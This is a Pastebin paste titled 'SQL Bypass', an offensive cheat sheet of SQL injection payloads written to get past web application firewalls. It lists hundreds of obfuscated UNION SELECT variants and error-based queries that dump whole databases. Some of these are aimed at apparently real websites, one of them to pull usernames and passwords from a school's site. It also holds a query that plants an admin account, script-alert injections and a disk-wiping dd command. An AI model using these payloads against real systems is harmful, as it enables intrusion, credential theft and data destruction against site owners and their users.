Guest User

SQL Bypass

a guest
Feb 9th, 2019
103
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ============================
  2. === BYPASS WAF BY AKDK ===
  3. ============================
  4. --'- : +--+ / : -- - : --+- : /* : %60 : %23 : %22 : ;%00 :
  5. === ORDER+BY ===
  6. /*!ORDER BY*/
  7. /*!50000ORDER BY*/
  8. /**/ORDER/**/BY/**/
  9. /*!order*/+/*!by*/
  10. /*!50000ORDER*//**//*!50000BY*/
  11. /*!12345ORDER*/+/*!BY*/
  12.  
  13. === UNION+SELECT ===
  14. /*!UnIoN*/SeLecT+
  15. /*!union*/+/*!select*/
  16. union+/*!select*/
  17. uNiOn aLl sElEcT
  18. UNIunionON+SELselectECT
  19. /**/union/*!50000select*//**/
  20. 0%a0union%a0select%09
  21. %0Aunion%0Aselect%0A
  22. %55nion/**/%53elect
  23. /**/union/**/select/**/
  24. /**/uNIon/**/sEleCt/**/
  25. +%2F**/+Union/*!select*/
  26. /**//*!union*//**//*!select*//**/
  27. /*!uNIOn*/ /*!SelECt*/
  28. +union+distinct+select+
  29. +union+distinctROW+select+
  30. /*!00000Union*/ /*!00000Select*/
  31. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  32. %55nion %53elect
  33. %55nion(%53elect 1,2,3)-- -
  34. +union+distinct+select+
  35. +union+distinctROW+select+
  36. /**//*!12345UNION SELECT*//**/
  37. /**//*!50000UNION SELECT*//**/
  38. /**/UNION/**//*!50000SELECT*//**/
  39. /*!50000UniON SeLeCt*/
  40. union /*!50000%53elect*/
  41. + #?uNiOn + #?sEleCt
  42. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  43. /*!%55NiOn*/ /*!%53eLEct*/
  44. /*!u%6eion*/ /*!se%6cect*/
  45. +un/**/ion+se/**/lect
  46. uni%0bon+se%0blect
  47. %2f**%2funion%2f**%2fselect
  48. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  49. REVERSE(noinu)+REVERSE(tceles)
  50. /*--*/union/*--*/select/*--*/
  51. union (/*!/**/ SeleCT */ 1,2,3)
  52. uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  53. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  54. %0A%09UNION%0CSELECT%10NULL%
  55. /*!union*//*--*//*!all*//*--*//*!select*/
  56. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  57. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  58. +UnIoN/*&a=*/SeLeCT/*&a=*/
  59. union+sel%0bect
  60. +uni*on+sel*ect+
  61. +#1q%0Aunion all#qa%0A#%0Aselect
  62. union(select (1),(2),(3),(4),(5))
  63. UNION(SELECT(column)FROM(table))
  64. %23akb%0AUnIOn%23akb%0ASeLecT+
  65. %23akb%0A%55nIOn%23akb%0A%53eLecT+
  66. union(select(1),2,3)
  67. union (select 1111,2222,3333)
  68. uNioN (/*!/**/ SeleCT */ 11)
  69. union (select 1111,2222,3333)
  70. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  71. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  72. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  73. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  74. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  75. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  76. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  77. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  78. /union\sselect/g
  79. /union\s+select/i
  80. /*!UnIoN*/SeLeCT
  81. +UnIoN/*&a=*/SeLeCT/*&a=*/
  82. +uni>on+sel>ect+
  83. +(UnIoN)+(SelECT)+
  84. +(UnI)(oN)+(SeL)(EcT)
  85. +�UnI�On�+'SeL�ECT�
  86. +uni on+sel ect+
  87. +/*!UnIoN*/+/*!SeLeCt*/+
  88. /*!u%6eion*/ /*!se%6cect*/
  89. uni%20union%20/*!select*/%20
  90. union%23aa%0Aselect
  91. /**/union/*!50000select*/
  92. /^.*union.*$/ /^.*select.*$/
  93. /*union*/union/*select*/select+
  94. /*uni X on*/union/*sel X ect*/
  95. +un/**/ion+sel/**/ect+
  96. +UnIOn%0d%0aSeleCt%0d%0a
  97. UNION/*&test=1*/SELECT/*&pwn=2*/
  98. un?<ion sel="">+un/**/ion+se/**/lect+
  99. +UNunionION+SEselectLECT+
  100. +uni%0bon+se%0blect+
  101. %252f%252a*/union%252f%252a /select%252f%252a*/
  102. /%2A%2A/union/%2A%2A/select/%2A%2A/
  103. %2f**%2funion%2f**%2fselect%2f**%2f
  104. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  105.  
  106. === concat() ===
  107. concat()
  108. CON%08CAT()
  109. CoNcAt()
  110. CoNcAt()
  111. %0AcOnCat()
  112. /**//*!12345cOnCat*/
  113. /*!50000cOnCat*/(/*!*/)
  114. unhex(hex(concat(table_name)))
  115. unhex(hex(/*!12345concat*/(table_name)))
  116. unhex(hex(/*!50000concat*/(table_name)))
  117.  
  118. === group_concat() ===
  119. /*!12345group_concat*/(/*!12345table_name*/)
  120. /*!50000group_concat*/(/*!50000table_name*/)
  121. /*!GrOuP_ConCaT*/()
  122. /*!12345GroUP_ConCat*/()
  123. /*!50000gRouP_cOnCaT*/()
  124. /*!50000Gr%6fuP_c%6fnCAT*/()
  125. /*!group_concat*/()
  126. gRoUp_cOnCAt()
  127. group_concat(/*!*/)
  128. group_concat(/*!12345table_name*/)
  129. group_concat(/*!50000table_name*/)
  130. /*!group_concat*/(/*!12345table_name*/)
  131. /*!group_concat*/(/*!50000table_name*/)
  132. unhex(hex(group_concat(table_name)))
  133. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  134. unhex(hex(/*!12345group_concat*/(table_name)))
  135. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  136. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  137. unhex(hex(/*!50000group_concat*/(table_name)))
  138. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  139. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  140. CONVERT(group_concat(table_name)+USING+latin1)
  141. CONVERT(group_concat(table_name)+USING+latin2)
  142. CONVERT(group_concat(table_name)+USING+latin3)
  143. CONVERT(group_concat(table_name)+USING+latin4)
  144. CONVERT(group_concat(table_name)+USING+latin5)
  145. convert(group_concat(table_name)+using+ascii)
  146. convert(group_concat(/*!table_name*/)+using+ascii)
  147. convert(group_concat(/*!12345table_name*/)+using+ascii)
  148. convert(group_concat(/*!50000table_name*/)+using+ascii)
  149.  
  150. === information_schema.tables ===
  151. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  152. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  153. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  154. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  155. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  156. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  157.  
  158. === Setelah Param ID Contoh id=1 +/*!and*/+1=0 ===
  159. +div+0
  160. Having+1=0
  161. +AND+1=0
  162. +/*!and*/+1=0
  163. and(1)=(0)
  164.  
  165. === Bypass error 505/timeout ===
  166. union(select+1)
  167. union%0bselect
  168. -gunakan %0b atau /**/
  169.  
  170. NB : Ketika -- atau --+- Tidak Bekerja, Maka Gunakan ;%00 Sebagai Penggantinya.
  171.  
  172. *************************************************************************************
  173.  
  174. String Injection method
  175.  
  176. --'- : +--+ / : -- - : --+- : /*
  177. ) order by 1-- -
  178.  
  179. ') order by 1-- -
  180.  
  181. ')order by 1%23%23
  182.  
  183. %')order by 1%23%23
  184.  
  185. Null' order by 100--+
  186.  
  187. Null' order by 9999--+
  188.  
  189. ')group by 99-- -
  190.  
  191. 'group by 119449-- -
  192.  
  193. 'group/**/by/**/99%23%23
  194.  
  195. union select ByPassing method
  196.  
  197. +union+distinct+select+
  198.  
  199. +union+distinctROW+select+
  200.  
  201. /**//*!12345UNION SELECT*//**/
  202.  
  203. /**//*!50000UNION SELECT*//**/
  204.  
  205. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  206.  
  207. +/*!u%6eion*/+/*!se%6cect*/+
  208.  
  209. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  210.  
  211. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  212.  
  213. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  214.  
  215. union /*!50000%53elect*/
  216.  
  217. %55nion %53elect
  218.  
  219. +--+Union+--+Select+--+
  220.  
  221. +UnIoN/*&a=*/SeLeCT/*&a=*/
  222.  
  223. id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
  224.  
  225. id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
  226.  
  227. UnIoN SeLeCt CoNcAt(version())--
  228.  
  229. uNiOn aLl sElEcT
  230.  
  231. uUNIONnion all sSELECTelect
  232.  
  233. ===================================================================================================================================
  234. :: Buffer Overflow ::
  235. ===================================================================================================================================
  236. +And(select 1)=(select 0×414)+union+select+1–
  237.  
  238. +And(select 1)=(select 0xAAAA)+union+select+1–
  239.  
  240. +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141)+
  241.  
  242. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  243.  
  244. ==================================================================================================================================
  245. :: 400 Bad Request ::
  246. ==================================================================================================================================
  247. –+%0A
  248.  
  249. union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –
  250.  
  251. ==================================================================================================================================
  252. null the parameter
  253. ==================================================================================================================================
  254. id=-1
  255.  
  256. id=null
  257.  
  258. id=1+and+false+
  259.  
  260. id=9999
  261.  
  262. id=1 and 0
  263.  
  264. id==1
  265.  
  266. id=(-1)
  267.  
  268. =======================================================================================================================================
  269. Group_Concat
  270. =======================================================================================================================================
  271. Group_Concat
  272.  
  273. group_concat()
  274.  
  275. /*!group_concat*/()
  276.  
  277. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  278.  
  279. group_concat(,0x3c62723e)
  280.  
  281. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
  282.  
  283. CoNcAt()
  284.  
  285. CONCAT(DISTINCT Version())
  286.  
  287. concat(,0x3a,)
  288.  
  289. concat%00()
  290.  
  291. %00CoNcAt()
  292.  
  293. /*!50000cOnCat*/(/*!Version()*/)
  294.  
  295. /*!50000cOnCat*/
  296.  
  297. /**//*!12345cOnCat*/(,0x3a,)
  298.  
  299. concat_ws()
  300.  
  301. concat(0x3a,,0x3c62723e)
  302.  
  303. /*!concat_ws(0x3a,)*/
  304.  
  305. concat_ws(0x3a3a3a,version()
  306.  
  307. CONCAT_WS(CHAR(32,58,32),version(),)
  308.  
  309. REVERSE(tacnoc)
  310.  
  311. binary(version())
  312.  
  313. uncompress(compress(version()))
  314.  
  315. aes_decrypt(aes_encrypt(version(),1),1)
  316.  
  317. ====================================================================================================================================
  318. To appear column numbr in page put after id
  319. ====================================================================================================================================
  320. id=1+and+1=0+union+select+1,2,3,4,5,6
  321.  
  322. +AND+1=0
  323.  
  324. /*!aND*/ 1 like 0
  325.  
  326. +/*!and*/+1=0
  327.  
  328. +and+2>3+
  329.  
  330. +and(1)=(0)
  331.  
  332. and (1)!=(0)
  333.  
  334. +div+0
  335.  
  336. Having+1=0
  337.  
  338. ===================================================================================================================================
  339. function ByPassing
  340. ===================================================================================================================================
  341. unhex(hex(value))
  342.  
  343. cast(value as char)
  344.  
  345. uncompress(compress(version()))
  346.  
  347. cast(version() as char)
  348.  
  349. aes_decrypt(aes_encrypt(version(),1),1)
  350.  
  351. binary(version())
  352.  
  353. convert(value using ascii)
  354.  
  355. ===================================================================================================================================
  356. avoid source page injection
  357. ===================================================================================================================================
  358. concat(?”>,<br><br><br>,@@version,?<img src=”,?<?’#)
  359.  
  360. “><br>? <img src=”
  361.  
  362. <img src=””/>injection<img src=”
  363.  
  364. concat(0x223e,@@version)
  365.  
  366. concat(0x273e27,version(),0x3c212d2d)
  367.  
  368. concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
  369.  
  370. concat(0x223e,@@version,0x3c696d67207372633d22)
  371.  
  372. concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)
  373.  
  374. concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)
  375.  
  376. concat(‘</title>’,@@version,’<title>’)
  377.  
  378. concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
  379.  
  380. concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
  381.  
  382. ===================================================================================================================================
  383. get version – DB_NAME – user – HOST_NAME – datadir
  384. ===================================================================================================================================
  385. version()
  386.  
  387. convert(version() using latin1)
  388.  
  389. unhex(hex(version()))
  390.  
  391. @@GLOBAL.VERSION
  392.  
  393. (substr(@@version,1,1)=5) :: 1 true 0 fals
  394.  
  395. # like #
  396.  
  397. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 –
  398.  
  399. ==================================================================================================================================
  400. +and substring(version(),1,1)=4
  401.  
  402. +and substring(version(),1,1)=5
  403.  
  404. +and substring(version(),1,1)=9
  405.  
  406. +and substring(version(),1,1)=10
  407.  
  408. id=1 /*!50094aaaa*/ error
  409.  
  410. id=1 /*!50095aaaa*/ no error
  411.  
  412. id=1 /*!50096aaaa*/ error
  413.  
  414. # like # http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/
  415.  
  416. id=1 /*!40123 1=1*/–+- no error
  417.  
  418. id=1 /*!40122rrrr*/ no error
  419.  
  420. # like # http://www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4
  421. =================================================================================================================================
  422. DB_NAME()
  423. =================================================================================================================================
  424. @@database
  425. database()
  426. id=vv()
  427. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 –
  428. http://www.marinaplast.com/page.php?id=vv()
  429. @@user
  430. user()
  431. user_name()
  432. system_user()
  433. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 –
  434.  
  435. HOST_NAME()
  436. @@hostname
  437. @@servername
  438. SERVERPROPERTY()
  439.  
  440. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 –
  441. @@datadir
  442. datadir()
  443. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 –
  444. ASPX
  445. and 1=0/@@version
  446. ‘ and 1=0/@@version;–
  447. ‘) and 1=@@version–
  448. and 1=0/user;–
  449.  
  450. Requested method
  451. [DUMP DB in 1 Request]
  452.  
  453. (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  454.  
  455. (select(@) from (select (@:=0×00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)
  456. ===================================================================================================================================
  457. [DUMP DB in 1 Request improve]
  458. ===================================================================================================================================
  459.  
  460. (select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
  461.  
  462. like
  463. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.colu mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 –
  464. ===================================================================================================================================
  465. #2#
  466. ===================================================================================================================================
  467. method like DUMP DB in 1 Request
  468. ===================================================================================================================================
  469. concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1)))
  470. like
  471. http://www.mishnetorah.com/shop/details.php…(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a ,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21
  472. ===================================================================================================================================
  473. #3#
  474. ===================================================================================================================================
  475. databases
  476.  
  477. (select+count(schema_name) +from+information_schema.schemata)
  478.  
  479. # like #
  480. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 –
  481.  
  482. tables
  483. (select+count(table_name) +from+information_schema.tables)
  484. # like #
  485. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 –
  486.  
  487. columns
  488. (select+count(column_name) +from+information_schema.columns)
  489. # like #
  490. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 –
  491. ===================================================================================================================================
  492. #4#
  493. ===================================================================================================================================
  494. show the table with all her columns
  495.  
  496. CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
  497.  
  498. +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1–+
  499.  
  500. like
  501. http://www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1–+
  502. ===================================================================================================================================
  503. #5#WWWWWWWWWWWAAAAAAAAAAAAAAAAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
  504. ===================================================================================================================================
  505. feltered requested
  506.  
  507. # tables #
  508. group_concat(/*!table_name*/)
  509.  
  510. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -
  511.  
  512. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -
  513.  
  514. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -
  515. ===================================================================================================================================
  516. # columns #
  517. ===================================================================================================================================
  518. group_concat(/*!column_name*/)
  519.  
  520. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  521.  
  522. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  523.  
  524. /*!froM*/ table– -
  525. ===================================================================================================================================
  526. #6#
  527. ===================================================================================================================================
  528. bypass method
  529.  
  530. (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
  531.  
  532. (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
  533.  
  534. like
  535. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 –
  536. ===================================================================================================================================
  537. #7#
  538. ===================================================================================================================================
  539. bypass method
  540.  
  541. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
  542.  
  543. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
  544.  
  545. like
  546. http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)–
  547.  
  548. ===================================================================================================================================
  549. [+] Union Select:
  550. ===================================================================================================================================
  551. union /*!select*/+
  552. union/**/select/**/
  553. /**/union/**/select/**/
  554. /**/union/*!50000select*/
  555. /**//*!12345UNION SELECT*//**/
  556. /**//*!50000UNION SELECT*//**/
  557. /**/uniUNIONon/**/selSELECTect/**/
  558. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  559. /**//*!union*//**//*!select*//**/
  560. /**/UNunionION/**/SELselectECT/**/
  561. /**//*UnIOn*//**//*SEleCt*//**/
  562. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  563. /**/UNunionION/**/all/**/SELselectECT/**/
  564. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  565. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  566. uni<on all sel<ect
  567. %20union%20/*!select*/%20
  568. union%23aa%0Aselect
  569. union+distinct+select+
  570. union+distinctROW+select+
  571. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  572. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  573. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  574. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  575. /*!u%6eion*/+/*!se%6cect*/+
  576. 1%’)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  577. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  578. union /*!50000%53elect*/
  579. +%2F**/+Union/*!select*/
  580. %55nion %53elect
  581. +–+Union+–+Select+–+
  582. +UnIoN/*&a=*/SeLeCT/*&a=*/
  583. uNiOn aLl sElEcT
  584. uUNIONnion all sSELECTelect
  585. union(select(1),2,3)
  586. union (select 1111,2222,3333)
  587. union (/*!/**/ SeleCT */ 11)
  588. %0A%09UNION%0CSELECT%10NULL%
  589. /*!union*//*–*//*!all*//*–*//*!select*/
  590. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  591. union+sel%0bect
  592. +uni*on+sel*ect+
  593. +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  594. union(select (1),(2),(3),(4),(5))
  595. UNION(SELECT(column)FROM(table))
  596. id=1+’UnI”On’+’SeL”ECT’ <-MySQL only
  597. id=1+’UnI’||’on’+SeLeCT’ <-MSSQL only
  598. union select 1–+%0A,2–+%0A,3–+%0A etc ….
  599. ===================================================================================================================================
  600. [+] Buffer overflow:
  601. ===================================================================================================================================
  602. +And(select 1)=(select 0×414)+union+select+1–
  603. +And(select 1)=(select 0xAAAA)+union+select+1–
  604. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  605. +and (/*!select*/ 1)=(/*!select*/ 0×414)+
  606. +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414?1414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141414141414141414141414141414141414141414141414141414141414141414141414?141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 4141)+
  607. ===================================================================================================================================
  608. [+] Group Concat:
  609. ===================================================================================================================================
  610. Group_Concat
  611. group_concat()
  612. /*!group_concat*/()
  613. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  614. group_concat(,0x3c62723e)
  615. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29
  616. CoNcAt()
  617. CONCAT(DISTINCT Version())
  618. concat(,0x3a,)
  619. concat%00()
  620. %00CoNcAt()
  621. /*!50000cOnCat*/(/*!Version()*/)
  622. /*!50000cOnCat*/
  623. /**//*!12345cOnCat*/(,0x3a,)
  624. concat_ws()
  625. concat(0x3a,,0x3c62723e)
  626. /*!concat_ws(0x3a,)*/
  627. concat_ws(0x3a3a3a,version()
  628. CONCAT_WS(CHAR(32,58,32),version(),)
  629. ===================================================================================================================================
  630. ERORE BASED
  631. ===================================================================================================================================
  632. =21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1–
  633.  
  634. Database
  635.  
  636. 21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  637.  
  638. Table_name
  639.  
  640. and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  641.  
  642. Columns
  643.  
  644. 21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  645.  
  646. extract date
  647.  
  648. http://www.aliqbalschools.org/index.php… and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  649.  
  650. Notice the limit function in the query
  651. A website can have more than 2 two databases, so increase the limit until you find all database names
  652. Example: limit 0,1 or limit 1,1 or limit 2,1
  653. ===================================================================================================================================
  654. Differences:
  655. Error Based Query for Database Extraction:
  656. ===================================================================================================================================
  657. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  658.  
  659. Double Query for Database Extraction:
  660.  
  661. and(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,cast(database() as char),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  662. information_schema.tables group by x)a) and 1=1
  663.  
  664. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  665. concat(0x7e,0×27,cast(schema_name as char),0×27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
  666. information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  667.  
  668. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  669. concat(0x7e,0×27,cast(table_name as char),0×27,0x7e) FROM information_schema.tables Where
  670. table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  671. information_schema.tables group by x)a) and 1
  672. ===================================================================================================================================
  673. WUBI +and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+
  674. ===================================================================================================================================
  675.  
  676. Descarci orice linux live, bootezi dupa el si formatezi cu dd+urandom. De acolo nu mai recupereaza NIMENI ceva.
  677. Code: dd if=/dev/urandom of=/dev/sda bs=1M
  678.  
  679. I’d say using concat(0xY)
  680.  
  681. Y being ‘<script>alert(‘Text here’);</script>’ in hex
  682. union select concat(version,0x3c7363726970743e616c6572742827706833776c27293c2f7363726970743e)
  683.  
  684. http://zerocoolhf.altervista.org/level2.php…
  685.  
  686. union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat(’0x’, hex(‘users’)
  687.  
  688. =113′+and+0+union+select+1,(SELECT (@) FROM (SELECT(@:=0×00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name,0x27293B3C2F7363726970743E))))x),3–+–
  689.  
  690. injection in sql database addd new user
  691. INSERT INTO admins (`name`,`password`,`email`) VALUES (‘unix’,'unixunix’,'unix_chro@yahoo.com’)
  692.  
  693. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  694.  
  695. CHALLENGES
  696.  
  697. Code:
  698. =(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(information_schema.columns)where(table_schema=database())and(table_name=0×7365637572697479))–+-
  699. =12+and+false/*!union*/ /*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,0x3c666f6e7420636f6c6f723d626c75653e3c68323e706833776c,15 from information_schema.tables where table_schema=0x66616272697a696f5f636572697070 LiMit 0,1–
  700. =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security–
  701. =121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7– -
